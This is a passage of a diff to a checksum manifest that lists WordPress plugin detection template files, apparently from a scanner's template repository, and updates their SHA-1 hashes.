-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:8d0fbab1f4b82811e437971f22c59b35b05d4f56 +http/technologies/wordpress/plugins/backwpup.yaml:b85b0ac11e48796ab647a41758960dda8e3ba52e +http/technologies/wordpress/plugins/better-search-replace.yaml:ff5148b91490a8c21792c647c2b378aeb2239909 +http/technologies/wordpress/plugins/better-wp-security.yaml:be4a16258cb1a9c7d8550d954912966ad1b7a613 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:a20fedf4e6e37183f486d770a2cc416a3945e140 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:3aed2c78d1600df497de42b20da2ca8210c8f97f +http/technologies/wordpress/plugins/breeze.yaml:0866d8b0ec62438666fcc91591a36025a1e1e800 +http/technologies/wordpress/plugins/broken-link-checker.yaml:b16fe4c9e104a1c8138a4777e7b8c71469d3e0ff +http/technologies/wordpress/plugins/chaty.yaml:37b2925071ba5d8fffe424aae475c78ffc0368f6 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:37478bd08f5b42672f1cbedbdd121ed3bdf2f2dd +http/technologies/wordpress/plugins/classic-editor.yaml:de9780574fe089f70cb4592531c2fcb9aceaa743 +http/technologies/wordpress/plugins/classic-widgets.yaml:fb6313919dcbb46701853e3c16b1be4c7778ede5 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:09ec8b79f9de141a83598f4e55ef0722d0c6c743 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:3e4f4904e60ae5fc2c007349705bdb1e9a5a5469 +http/technologies/wordpress/plugins/coblocks.yaml:48726c9c542ab6495e1e672a8eefad76b1b38243 +http/technologies/wordpress/plugins/code-snippets.yaml:64118e72dbddfb61b7eb960c09846f4479e6e447 +http/technologies/wordpress/plugins/coming-soon.yaml:b435b10eeee22da82f92e7019a573f296330882a +http/technologies/wordpress/plugins/complianz-gdpr.yaml:8b839792831a2c9c0095ce65e4b00ac6f93af10c +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:d59035b80834fd312be529a2aee0099d813ff51f +http/technologies/wordpress/plugins/contact-form-7.yaml:fecc3da4d9b86091abbbe23a71f45fcf771c3039 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dbd3a89c1a074953d10f09e0b2a51551b8249e58 +http/technologies/wordpress/plugins/cookie-law-info.yaml:3e5d8a0057ff25efc1ef2f917e05e23d4034b080 +http/technologies/wordpress/plugins/cookie-notice.yaml:7bf098e4c75409c50a3fe2e46bc39a303aa3c3aa +http/technologies/wordpress/plugins/copy-delete-posts.yaml:e74b9a9284f6c91f6a3c0e8bed9d2bef07aa9537 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:81e5e5ee5c54e9fded9421e6dc10e7f3501fe543 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:7b258b4d71e3c588e18511737e39cf12332b46cd +http/technologies/wordpress/plugins/custom-css-js.yaml:d9e63aa88e33aa0dd53763dbfaa051806ecfc707 +http/technologies/wordpress/plugins/custom-fonts.yaml:1be1de13977630f1bd57bdbd8c746c5e4f3df7c7 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:348080487d823302e9be0383a62fd78b607c9feb +http/technologies/wordpress/plugins/disable-comments.yaml:d1324ac0b8bda7657d83cb9d7b6465015fe1c6ee +http/technologies/wordpress/plugins/disable-gutenberg.yaml:153f0bd6af6502c610ef69ddc10794e3e2cb67cd +http/technologies/wordpress/plugins/duplicate-page.yaml:12ebf8529d3e7272b60926cf6be3dc38f692ecd1 +http/technologies/wordpress/plugins/duplicate-post.yaml:a76fc7ad257bccfbb9e110380b7ec13e1970bbc5 +http/technologies/wordpress/plugins/duplicator.yaml:737ae1b94336ce12a6643e4328e2953a4e0e6afc +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:873f4ec122d70d01a8625a7cc2609377d1bd8342 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:95d81a84f118874cf0851da3f768f62d534e4d33 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7e16d0e03302d2603da11109c4135dc0acf1822b +http/technologies/wordpress/plugins/elementor.yaml:491fac0b81a64b11140992beb244bccf7181c35c +http/technologies/wordpress/plugins/elementskit-lite.yaml:6a29fb903e1128f10b1ff26ae107f6246e129a6d +http/technologies/wordpress/plugins/enable-media-replace.yaml:aba426512690db2f47b07515bd112e30ddbf753b +http/technologies/wordpress/plugins/envato-elements.yaml:e40b280d69223f57b3b97dab6d362491723effca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:4c5e6aee3f20ec4fea7e802a0b6e34fdcce286b9 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:cc2e897214626a4234480952cab9339523e60151 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:1a6ab177428c061fc07c5c47596da050ad39486a +http/technologies/wordpress/plugins/fast-indexing-api.yaml:1ee52cf84d45a9bb1dd616b18966fca676e4ddde +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c950ccb4b360864ed106a4d25bb5d4770ac93458 +http/technologies/wordpress/plugins/flamingo.yaml:1bd1285f2411f0ed75c64b775d25c62c42dd131e +http/technologies/wordpress/plugins/fluentform.yaml:f8172f4af850d06fdfcc1bdd7de51612c9942f3c +http/technologies/wordpress/plugins/font-awesome.yaml:198615574b193f7ed7791e491870ab42c0b3e3b6 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6cecd8c3c1c422d2c63f5f8ea873ba73511a2f7a +http/technologies/wordpress/plugins/formidable.yaml:b8b5f9c09726fbd1439b7142baa0f86dcabb97b3 +http/technologies/wordpress/plugins/forminator.yaml:5bf375bc0a4da458e871fb47fe38a5f7095be8a9 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:c472292f6fe36e9ea57802d4f0bedef89e1c51bf +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:2cf1904da3bb2b487f693a3e36d42f58282c391b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ee89d448c9da169a01877c44ec4c6a4b051e7043 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:26ecf9fc2b07c3721bb3c68fe3842725d15a0e8c +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:50e59218e437d3ca85a65fdebe130d95f417fc9f +http/technologies/wordpress/plugins/google-site-kit.yaml:63af18b6ef4b23834ea5dc823a1928f915d0adec +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:e5d41a5b72300261587d91a24fb5d5005ce110ff +http/technologies/wordpress/plugins/gtranslate.yaml:7a3af2b2031d60e2854ca027bbd2eaeaf0342e55 +http/technologies/wordpress/plugins/gutenberg.yaml:32e5a829c4ac712281405af99c4e7cb354970302 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:02cbd3b19ed597598fea5038f95df3b9aa846298 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:84becbc762eb95efbfda0d93c0143eaa5199fe8c +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f00805f28fd5cf4152a11e51a2ef8ecf416b623 +http/technologies/wordpress/plugins/header-footer.yaml:7d274575329c811f086d9300939cbe812f02b8c0 +http/technologies/wordpress/plugins/health-check.yaml:4353086cc7b50dcf484f41d13921fca77351ba26 +http/technologies/wordpress/plugins/hello-dolly.yaml:10510fd54d122fd9325f9bf6cfa9ec9168279063 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:d8ce07bf44bcead103c1d5b2fb27b101ea57b424 +http/technologies/wordpress/plugins/hostinger.yaml:aa2b62c0ce10c9a1aebc7f88ff4fdaeb4882e5e3 +http/technologies/wordpress/plugins/image-optimization.yaml:217a5a007a97dd8fc86ce582f78e2e0e47a189f0 +http/technologies/wordpress/plugins/imagify.yaml:eeb3548eae665a93c7952ed30099ae8fde404299 +http/technologies/wordpress/plugins/imsanity.yaml:cbc7426a329296f82a1acc8773b2bd2933119174 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:32299a9e7ff53ae6ec220a2eff7b71afc8667103 +http/technologies/wordpress/plugins/instagram-feed.yaml:d465693c6685b91b263dc675dda5c85b106422ca +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d6460adaab2f2b574db4c8205b32330a058f9b39 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:0a0fb26b50531e3c599a4e71578a650a1565ce88 +http/technologies/wordpress/plugins/jetpack.yaml:727e18630b717fca79dfb844c3fd9003a42e0d84 +http/technologies/wordpress/plugins/kadence-blocks.yaml:da282fd4bc52389fc5861a64fdda6c8d7c699e51 +http/technologies/wordpress/plugins/kirki.yaml:ee4bf55b20ba76249be63aed87124ac64d614571 +http/technologies/wordpress/plugins/leadin.yaml:b504ef71d6d7e98e80b9ba72a65356d5edae3d1f +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:de3538623c0381893be9f04e1ad2cbf169cc222e +http/technologies/wordpress/plugins/limit-login-attempts.yaml:ca8c2c8f3e74535f8bd4f304ca5f6fbf8d9fe3e4 +http/technologies/wordpress/plugins/litespeed-cache.yaml:2eeb36ec97f755a0452a3d7aed525276e6ee6af7 +http/technologies/wordpress/plugins/loco-translate.yaml:54675c250c367fc4fa4a435e9f4f42c16cc91cd0 +http/technologies/wordpress/plugins/loginizer.yaml:868c23bc4020a4a9e71434f254927ae2d9f1e344 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:986e9fae35cc4e51b075aecbf4d46b6e14a494dc +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:a49ba8819d738e309e1b09e384ddd2e226cf605b +http/technologies/wordpress/plugins/mailpoet.yaml:36b8d097248299698a2a97b8b30d452c18b10900 +http/technologies/wordpress/plugins/maintenance.yaml:ca01ab9f9ec329ca076fb46cb0de2fde9f9073ba +http/technologies/wordpress/plugins/mainwp-child.yaml:0b3f1c856cf1ddec2f3fd31b705d0b04a172c958 +http/technologies/wordpress/plugins/malcare-security.yaml:7bb6fd19d16635f20c046f636187e6c9d2491d29 +http/technologies/wordpress/plugins/megamenu.yaml:5fd772d7f63ccec1a75bf35b8cb1601f95531cfa +http/technologies/wordpress/plugins/members.yaml:42cfec8382ff138336ed5186adba2366ea106492 +http/technologies/wordpress/plugins/meta-box.yaml:c19971f5871d012b9352dd5df4f8918589209013 +http/technologies/wordpress/plugins/metform.yaml:48b0877d44f6a3654bc69afd2db435b3510872a7 +http/technologies/wordpress/plugins/ml-slider.yaml:d6e4259b94c7609245d781db51020a7bcdd5c746 +http/technologies/wordpress/plugins/newsletter.yaml:e162970b87a6981e14d63a6992d321e612a7f783 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a97e3834b12dcf307e6595200dbff12a93677987 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:8f01cbd8f5d80c4d2139b766e2144bb2c7d65d45 +http/technologies/wordpress/plugins/ninja-forms.yaml:1b77045e52afbd382f110abeeae8ffaa73e25cc8 +http/technologies/wordpress/plugins/ocean-extra.yaml:ff55747b1d481b0b35cbdebe92b5d8ac970e7744 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:50793d62f4d39740b4ca528603143383e8f41f71 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:e6ef59f7a526c359f30a59b13137097fbd8847a2 +http/technologies/wordpress/plugins/optinmonster.yaml:8518622de2f0cb6b2081a3879369f5f97ee206b9 +http/technologies/wordpress/plugins/otter-blocks.yaml:061ba0e795da66af647ccb0dec59681a7a30e098 +http/technologies/wordpress/plugins/password-protected.yaml:ad58ac9efaf70da0b09644804935893b9b40c939 +http/technologies/wordpress/plugins/pdf-embedder.yaml:d4f21f680453cd5b47ad0e5555256fa5fa83d81f http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:11dd6a395a53fc5517b30c0624dd9b1669e5346e +http/technologies/wordpress/plugins/pixelyoursite.yaml:077f7614026d1205187d51bbdcef58e8a3db6ac0 +http/technologies/wordpress/plugins/polylang.yaml:0fc002ec70d3298206670bafe4bc48e55670aa5c http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:cbe0f76128a5a5ced48cfc77076a4c9ee1c35822 +http/technologies/wordpress/plugins/post-smtp.yaml:a62a68ab9303f483e86b071670bbd510ee37802d +http/technologies/wordpress/plugins/post-types-order.yaml:8211ba9701976b5e98ec775e89d5dfd20fd92a17 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c942200d07dc080be326d618e0a58b2fe7b66730 +http/technologies/wordpress/plugins/pretty-link.yaml:329473b32f16dafe4a62d9ebca2a96eb70c6e91a +http/technologies/wordpress/plugins/really-simple-captcha.yaml:cba5f050ebd17e6c968d545f987cc1fcdbc52e72 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bfbaff85043768e49dcb88ffde2e450f50136f1a +http/technologies/wordpress/plugins/redirection.yaml:7a21fab3f2e5a801dbdd07ea7e51b9d47b748205 +http/technologies/wordpress/plugins/redux-framework.yaml:e43a6587dd96b8f1f86ce35d2f39dc796bceff49 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:5225739ab5b8fc51341dec0d467bc7856c006e64 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:fa67345e6cc53122501a62d2619d4b516f2676ce +http/technologies/wordpress/plugins/safe-svg.yaml:0e22cb85cce8330361a48f5c0329c12ec51af2f1 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:7bf5ad0edf0fff0bb88f0c6e87fc31af67df89ff +http/technologies/wordpress/plugins/sg-cachepress.yaml:352b201121a8673e445736b95ceb2df20c8a10fc +http/technologies/wordpress/plugins/sg-security.yaml:51236a8025498fbf82d039fa748de5e45bf19811 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:532041918512da4c2edbb61548f59aacdb439a19 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:c96f8367ff2cd6a6e712364dbff7f984b7ade796 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:455deb7e048121d78659b631710a852751b8ac40 +http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:978f93a7817ae16c31d0b1338dc351a44943f8ed +http/technologies/wordpress/plugins/siteorigin-panels.yaml:0d3ccf351203eeb1e02ba54e0eee315b878aae71 +http/technologies/wordpress/plugins/smart-slider-3.yaml:3a3a13decb3b4884909b47e412dc122cb5ecae6e +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9bf25572295f571edaa4f7f50764ac89c4e69c09 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b 